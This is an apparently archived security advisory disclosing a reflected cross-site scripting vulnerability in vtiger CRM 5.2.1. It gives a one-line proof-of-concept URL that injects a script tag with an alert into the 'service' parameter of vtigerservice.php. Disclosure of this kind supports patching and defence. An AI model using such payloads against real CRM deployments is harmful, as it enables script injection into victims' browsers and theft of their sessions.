Home
Consulting
Advisories
Software
Articles
Contact

vtiger CRM 5.2.1 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in vtiger CRM 5.2.1 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/vtigercrm/vtigerservice.php?service=%3Cscript%3Ealert%280%29%3C/script%3E


Copyright © 2018 AutoSec Tools LLC